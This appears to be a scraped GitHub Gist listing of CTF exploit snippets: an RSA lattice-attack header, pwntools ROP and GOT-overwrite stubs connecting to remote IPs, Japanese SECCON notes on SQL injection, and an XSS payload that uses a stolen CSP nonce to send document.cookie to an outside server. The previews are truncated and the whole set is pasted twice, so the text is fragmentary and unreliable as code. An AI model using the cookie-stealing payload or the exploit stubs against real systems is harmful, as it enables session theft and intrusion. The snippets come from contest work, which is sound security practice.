Rex rekkusu

## sharsable.sage
# Overview
# This challenge is based on May's version of Wiener's Attack
# (https://www.math.uni-frankfurt.de/~dmst/teaching/WS2015/Vorlesung/Alex.May.pdf)
# But the attack can't be apply to the challenge because it has 2 exponents,
# so you have to extend the method of May.
# After LLL, choose 2 shortest vectors and reconstruct polynomial.
# then pick coefficients and decrypt ciphertext

import json
from binascii import unhexlify

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                rekkusu
                / keybase.md
            
            
              Created
              December 6, 2019 18:37
            
          
    Keybase proof

I hereby claim:

I am rekkusu on github.
I am xrekkusu (https://keybase.io/xrekkusu) on keybase.
I have a public key ASDikKa6pgDX2d4GPEgqRbS4aQZnkti0ROig4psGPje8bAo

To claim this, I am signing this object:

  
## getflag.html
<script>
  fetch('/nonce').then(r => r.text()).then(nonce => {
    document.write('<iframe src="http://35.187.214.138:10023/?q=<script nonce='+nonce+'>location.href=\'//[server]/flag?f=\'%2Bdocument.cookie\x3c\x2fscript>"></iframe>');
  });
</script>

## chat.py
from pwn import *
import string

strcmp_got = 0x603050
free_libc = 0x222c40
free_got = 0x603018
strchr_libc = 0x86d40
strchr_got = 0x603038
#system_libc = 0x46590
system_libc = 0xe5765 # One gadget RCE

## exploit.py
from pwn import *

# local libc
libc_data = 0x1bb000
libc_main_arena = libc_data + 0x203760
libc_environ = libc_data + 0x2064a0
libc_gadget = {
    'poprdi': 0x22b1a,
    'poprsi': 0x24805,
    'poprdx': 0x1b8e,

## SECCON2015 final 問題解説メモ
[intercollege]
1. WebServiceX
記事投稿掲示板
SQLi
パス丸見え
削除キーを抜き取り記事を削除する

2. SECCON競馬
node.jsで稼働するサーバ
各所にあるSQLiを攻撃

## rhinoxorus.py
from pwn import *

ret_addr = 0x8056afa
pop2ret = 0x80578fa
leaveret = 0x804889f
password = 0x805f0c0
sock_send = 0x804884b

s = remote('54.152.37.20', 24242)
payload = [

## autobots.py
from pwn import *
import re
import os
import time
import sys

REMOTE = len(sys.argv) >= 2 and sys.argv[1] == 'r'

csu_pop = 0x4008ca
csu_call = 0x4008b0

## 0_reuse_code.js
// Use Gists to store code you would like to remember later on
console.log(window); // log the "window" object to the console

## myrsa.py
A = 2**127 - 1
B = 2**521 - 1
M = 2**607 - 1
e = 2 ** 16 + 1
N = 63818680202675589216815967315756339566489246779116223051722243409259352306082269405584940079271925323037734694881017657210693291225811959344097136283943773119253977386753351100049200282621303479907450098708525270143513533970091975470643256818850535284677109438825447301648598261836252545636152169068763895406856318437232759172916712871952129664784095465920918889209

# Mathematica
# X = Mod[FindInstance[Reduce[A*x^2 + B*x - NN + k*M == 0, {x, k}, Integers], {x, k}][[1]][[1]][[2]], M]
X = 191381205906541365810282593776863206661156657204872893015293939948869850881931905283828875884014270971209197231695869794928684848246961454267088835714426435068255775651115299873104893
	# Overview
	# This challenge is based on May's version of Wiener's Attack
	# (https://www.math.uni-frankfurt.de/~dmst/teaching/WS2015/Vorlesung/Alex.May.pdf)
	# But the attack can't be apply to the challenge because it has 2 exponents,
	# so you have to extend the method of May.
	# After LLL, choose 2 shortest vectors and reconstruct polynomial.
	# then pick coefficients and decrypt ciphertext

	import json
	from binascii import unhexlify
	<script>
	fetch('/nonce').then(r => r.text()).then(nonce => {
	document.write('<iframe src="http://35.187.214.138:10023/?q=<script nonce='+nonce+'>location.href=\'//[server]/flag?f=\'%2Bdocument.cookie\x3c\x2fscript>"></iframe>');
	});
	</script>
	from pwn import *
	import string

	strcmp_got = 0x603050
	free_libc = 0x222c40
	free_got = 0x603018
	strchr_libc = 0x86d40
	strchr_got = 0x603038
	#system_libc = 0x46590
	system_libc = 0xe5765 # One gadget RCE
	from pwn import *

	# local libc
	libc_data = 0x1bb000
	libc_main_arena = libc_data + 0x203760
	libc_environ = libc_data + 0x2064a0
	libc_gadget = {
	'poprdi': 0x22b1a,
	'poprsi': 0x24805,
	'poprdx': 0x1b8e,
	[intercollege]
	1. WebServiceX
	記事投稿掲示板
	SQLi
	パス丸見え
	削除キーを抜き取り記事を削除する

	2. SECCON競馬
	node.jsで稼働するサーバ
	各所にあるSQLiを攻撃
	from pwn import *

	ret_addr = 0x8056afa
	pop2ret = 0x80578fa
	leaveret = 0x804889f
	password = 0x805f0c0
	sock_send = 0x804884b

	s = remote('54.152.37.20', 24242)
	payload = [
	from pwn import *
	import re
	import os
	import time
	import sys

	REMOTE = len(sys.argv) >= 2 and sys.argv[1] == 'r'

	csu_pop = 0x4008ca
	csu_call = 0x4008b0
	// Use Gists to store code you would like to remember later on
	console.log(window); // log the "window" object to the console
	A = 2**127 - 1
	B = 2**521 - 1
	M = 2**607 - 1
	e = 2 ** 16 + 1
	N = 63818680202675589216815967315756339566489246779116223051722243409259352306082269405584940079271925323037734694881017657210693291225811959344097136283943773119253977386753351100049200282621303479907450098708525270143513533970091975470643256818850535284677109438825447301648598261836252545636152169068763895406856318437232759172916712871952129664784095465920918889209

	# Mathematica
	# X = Mod[FindInstance[Reduce[Ax^2 + Bx - NN + k*M == 0, {x, k}, Integers], {x, k}][[1]][[1]][[2]], M]
	X = 191381205906541365810282593776863206661156657204872893015293939948869850881931905283828875884014270971209197231695869794928684848246961454267088835714426435068255775651115299873104893